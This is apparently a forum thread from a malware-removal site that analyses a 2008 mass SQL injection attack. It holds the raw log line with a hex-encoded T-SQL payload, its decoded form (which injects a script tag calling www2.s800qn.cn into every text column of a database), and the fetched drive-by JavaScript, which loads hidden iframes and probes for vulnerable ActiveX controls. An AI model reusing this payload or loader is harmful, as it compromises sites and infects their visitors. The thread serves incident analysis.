xxx.xxx.xxx.xxx - - [11/Oct/2008:14:03:14 +0000] "GET /forum/viewtopic.php?f=11&t=35291';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwareremoval.com) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--14:08:09--  http://www2.s800qn.cn/csrss/w.js
           => `w.js'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

return true;
}

if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe  width=0 height=0 src=http://www2.s800qn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--14:11:17--  http://www2.s800qn.cn/csrss/new.htm
           => `new.htm'
Resolving www2.s800qn.cn... 121.11.76.85
Connecting to www2.s800qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://s46.cnzz.com/stat.php?id=1084964&web_id=1084964" language="JavaScript" charset="gb2312"></script>
<SCRIPT>
document.write("<iframe width=50 height=0 src=flash.htm></iframe>");
document.write("<iframe width=50 height=0 src=ani.htm></iframe>");
document.write("<iframe width=100 height=0 src=cx.htm></iframe>");
document.write("<iframe width=100 height=0 src=mi.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=06014.htm></iframe>");
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=ff.htm></iframe>");}}
try{var w;
var ml=new ActiveXObject("DPClient.Vod");}
catch(w){};                     
finally{if(w!="[object Error]"){document.write("<iframe width=100 height=0 src=xl.htm></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real10.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real11.htm></iframe>");
}
test();
</SCRIPT>
</HEAD>
</HTML>
<iframe width=50 height=0 src=tr.htm></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/2204425.js"></script>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--14:14:26--  http://js.users.51.la/2204425.js
           => `2204425.js'
Resolving js.users.51.la... 121.11.69.211
Connecting to js.users.51.la[121.11.69.211]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
document.write ('<a href="http://www.51.la/?2204425" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');


Code: [Select]
--14:18:32--  http://www.51.la/?2204425
           => `?2204425'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body,td,p {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all}
input {font: 14px "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif;;padding:4px;vertical-align:middle;border:1px solid #CCCCCC;background:#fff;}
p {line-height:17px;text-align:left;margin:6px 0px}
a {color: #000000;text-decoration: none;}
a:hover {color: #1562BF;text-decoration: none}
.a1 {color: #1562BF;text-decoration: none;}
.a1:hover {color: #000;text-decoration: none;}
img {border:none;vertical-align:middle;}
div {text-align:left}
.left {float: left;}
.right {float: right;}
.fonts {color:#1562BF}
.vcode {border: 1px solid #3C67BF;background:#DDE8FC;vertical-align: text-bottom;padding:6px;}
#allbody {width:760px;margin: 0 auto}
.form {padding:9px 0px 9px 20px;margin:0px;}
#iright {padding:9px;width:237px;margin-right:4px;border:1px solid #999;background:#F3F3F3;filter: Alpha(Opacity=92, FinishOpacity=2); opacity:0.92;}
.btlogin {border:none;background:url('images/index_bt_login.gif');width:81px;height:33px;}
#it123 {margin:12px 0px;}
#it123 p {line-height:17px;color:#666}
#bottom  {float: left;width:760px;height:62px;text-align: center;margin-top:3px;padding:20px 0px 0px 0px;background:url('../images/bottom_bg.gif')}
#userlogin {height:270px;width:100%;}
#guestin {height:270px;width:100%;}
</style>
<title>大牛X统计报告 - “我要啦”提供</title>
</head>
<body style="margin-top:12px">
<div id="allbody">
 <div id="tops" style="width:760px;height:55px">
  <div class="left"><img src="images/index_logo.gif" alt="我要啦免费网站访问统计系统" /></div>
  <div class="right"><p style="text-align:right;padding:0px;margin:0px">
   <a href="http://old.51.la/" class="a1">怀念旧版</a>
   | <a href="reg.asp">免费申请</a>
   | <a href="login.asp">登录</a>

   | <a href="http://bbs.51.la/" target="_blank">站长交流大厅</a>
   | <a href="http://top.51.la/" target="_blank">排行榜</a>
   | <a href="news.asp">日志</a>
   | <a href="http://help.51.la/">帮助</a></p>
  <p style="text-align:right;padding:2px 0px 0px 0px;margin:0px;color:red"><img src="images/index_zhuyi.gif" alt="注意" /> 注意: 您已经离开刚才访问的网站 ,进入了 51.La 免费统计服务网站</p>
  </div>
 </div>
 <div id="bodys" style="width:760px;height:auto;overflow:hidden;background:url('images/index_show.jpg') no-repeat 0px 25px">
  <!--右侧内容-->
  <div class="right" id="iright">
   <div id="userlogin" style="display:none">
   <img src="images/index_rtext_login.gif" alt="我要啦用户登录" />
   <form id="f1" action="login.asp" method="post" class="form">
<p>用户名 <input name="uname" id="uname" style="width:140px" /></p>
<p>密 码 <input type="password" name="upass" id="upass" style="width:140px" /></p>
<p>验证码 <input name="vcode" id="vcode" style="width:45px" /> 请输入 <span class="vcode"><img alt="验证码" src="user/vcode.asp" style="height:10px;width:40px" /></span></p>
<p>
<input type="submit" value=" &nbsp; " class="btlogin" /> &nbsp;&nbsp;
<a href="reg.asp"><img src="images/index_bt_reg.gif" alt="免费注册" /></a>
</p>
<p style="padding:9px 0px 6px 0px;text-indent: -3px;"><input type="checkbox" name="remb" value="yes" style="border:none;background:#F3F3F3;" />记住这个身份(共用电脑者慎用)</p>
<p><a href="usergetpass.asp" class="a1">忘记了密码?</a>
    <br /><a href="about.asp" class="a1">深入了解我要啦免费统计……</a>
<br />
</p>
   </form>
   </div>

   <div id="guestin">
   <img src="images/index_rtext_report.gif" alt="查看用户统计报表" />
    <div class="form">

<form target="_top" action="report/0_help.asp" method="post" style="padding:0px;margin:0px">
  <p class="fonts">用户网站【大牛X】</p>
  <p>报表未公开<br />请输入独立查看密码以打开报表</p>
  <input type="hidden" name="id" value="2204425" />
  <input type="hidden" name="t" value="chalogin" />
  <p>查看权密码 <input name="lookpass" type="password" size="14" /></p>
  <p style="padding:5px 0px 12px 0px;"><input type="submit" value=" &nbsp; " class="btlogin" /></p>
</form>
    <p><a href="http://help.51.la/faq/#17" target="_blank" class="a1">什么是独立查看密码?</a></p>

    <p><a href="#" onclick="document.getElementById('userlogin').style.display='';document.getElementById('guestin').style.display='none';return false;" class="a1">切换到用户登录界面
</p>
</div>
   </div>

   <img src="images/index_rtext_reg.gif" alt="免费注册我要啦用户" />
   <div class="form">
    <p><a href="reg.asp"><img src="images/index_regnow.gif" alt="立即免费申请" /></a><br /><a href="report/1_main.asp?id=1" class="a1">观看功能演示</a>
    </p>
   </div>
  </div>
  <!--左侧内容-->
  <div class="left" style="width:492px">
   <div style="height:17px;padding-top:8px"><img src="images/index_loveme.gif" alt="中文站长必备工具" /></div>
   <div><img src="images/index_showtop.jpg" alt="封面" usemap="#Map" /></div>
   <map name="Map"><area shape="rect" coords="320,120,425,143" href="report/1_main.asp?id=1" alt="点击观看功能演示" target="_blank"></map>
   <div id="it123">
    <table>
<tr><td style="width:50px;text-align:center;"><img src="images/index_1.gif" alt="您真的了解您的站点吗?" /><br /><br /><br /></td><td><img src="images/index_1b.gif" alt="您真的了解您的站点吗?" /><p>每天有多少人访问您的网站? 现在有谁正在您的网站上? 他们做了什么?<br />他们从何而来? 搜索引擎为您带来多少点击? 访问者搜索的关键词是什么?<br />您的哪个栏目哪个网页更受欢迎? ……</p></td></tr>
<tr><td style="width:50px;text-align:center;"><img src="images/index_2.gif" alt="我要啦免费统计就是您智明的眼睛!" /><br /><br /><br /></td><td><img src="images/index_2b.gif" alt="我要啦免费统计就是您智明的眼睛!" /><p>成熟、完善、人性化的功能设计,符合并引导着中文站长使用习惯。<br />有了我要啦免费统计,您的问题将迎刃而解!<br /><br /></p></td></tr>
<tr><td style="width:50px;text-align:center;"><img src="images/index_3.gif" alt="知名的站长社区" /><br /><br /><br /></td><td><img src="images/index_3b.gif" alt="知名的站长社区" /><p>畅游我要啦站长交流大厅,结识热情、友善、成熟的互连网同行,<br />您的视野会更加开阔,站点建设和推广将更加得心应手。<br /><br /></p></td></tr>
</table>
   </div>
  </div>
 </div>

 <div style="width:760px;text-align: center;margin-bottom:18px;float: left;">
  <a href="http://www.firstdh.com/reg.php" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_firstdh.gif" /></a>
  <a href="http://www.15ai.com/spltb.html" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_15ai.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.9v.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_9v.gif" /></a>
  <a href="http://www.leledh.com/add.asp" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_leledh.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>

 <!--版权栏-->
 <div style="float: left;width:760px;text-align:center;margin-top:0px">
 <a class="a1" href="/rule.asp">用户守则</a>
 | <a class="a1" href="/usergetpass.asp">找回密码</a>
 | <a class="a1" href="/friend.asp">广告联系</a>
 | <a class="a1" href="/users.asp">典型用户</a>
 | <a class="a1" href="/contact.asp">联系我们</a>
 | <a class="a1" href="/about.asp">关于我们</a>
 </div>
 <div id="bottom">
 服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
 我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 版权所有 2002-2008 豫ICP备05009218号<br />
 
<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
 <noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
 </div>
</div>
</body>
</html>


<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>
Title: Re: SQL Injected jscript sites
Post by: JohnC on October 14, 2008, 03:55:19 pm
Thanks.